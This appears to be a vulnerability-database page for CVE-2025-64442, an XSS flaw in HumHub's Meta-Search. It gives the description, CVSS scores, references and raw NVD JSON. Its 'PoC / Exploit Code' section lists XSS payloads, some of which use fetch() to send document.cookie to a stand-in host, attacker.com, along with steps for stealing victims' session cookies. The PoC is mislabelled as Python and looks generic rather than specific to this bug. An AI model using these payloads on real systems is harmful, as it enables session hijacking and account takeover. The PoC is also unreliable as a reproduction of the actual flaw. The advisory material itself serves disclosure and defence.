CVE-2025-64442

Description

HumHub is an Open Source Enterprise Social Network. Versions below 1.17.4 have a XSS vulnerability in the Meta-Search feature which allows malicious input to be executed in search previews. This issue is fixed in version 1.17.4.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:humhub:humhub:*:*:*:*:*:*:*:* - VULNERABLE

HumHub < 1.17.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-64442 PoC for HumHub Meta-Search XSS -->
<!-- Payload: <script>alert(document.domain)</script> -->
<!-- This PoC demonstrates the XSS vulnerability in HumHub's Meta-Search feature -->

<!-- Method 1: Direct script injection -->
<script>alert('XSS');console.log('Cookie: '+document.cookie)</script>

<!-- Method 2: Event handler based -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- Method 3: SVG based -->
<svg/onload=fetch('https://attacker.com/log?data='+btoa(document.cookie))>

<!-- Exploitation steps:
1. Inject malicious payload in HumHub search box
2. Wait for victim to view search preview
3. Malicious JS executes in victim's browser context
4. Attacker steals session cookies or performs actions as victim
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64442
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64442
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64442/
[4] VulDB https://vuldb.com/cve/CVE-2025-64442
[5] https://github.com/humhub/humhub/pull/7814
[6] https://github.com/humhub/humhub/releases/tag/v1.17.4
[7] https://github.com/humhub/humhub/security/advisories/GHSA-2hgp-33j2-93cc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64442", "sourceIdentifier": "[email protected]", "published": "2025-11-07T21:15:41.847", "lastModified": "2025-11-26T15:41:54.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HumHub is an Open Source Enterprise Social Network. Versions below 1.17.4 have a XSS vulnerability in the Meta-Search feature which allows malicious input to be executed in search previews. This issue is fixed in version 1.17.4."}, {"lang": "es", "value": "HumHub es una Red Social Empresarial de Código Abierto. Las versiones anteriores a la 1.17.4 tienen una vulnerabilidad XSS en la función de Meta-Búsqueda que permite que una entrada maliciosa se ejecute en las vistas previas de búsqueda. Este problema está solucionado en la versión 1.17.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:humhub:humhub:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.4", "matchCriteriaId": "C645FF0D-F1B7-4ADB-8F4A-5BC04EFAB53B"}]}]}], "references": [{"url": "https://github.com/humhub/humhub/pull/7814", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/humhub/humhub/releases/tag/v1.17.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/humhub/humhub/security/advisories/GHSA-2hgp-33j2-93cc", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}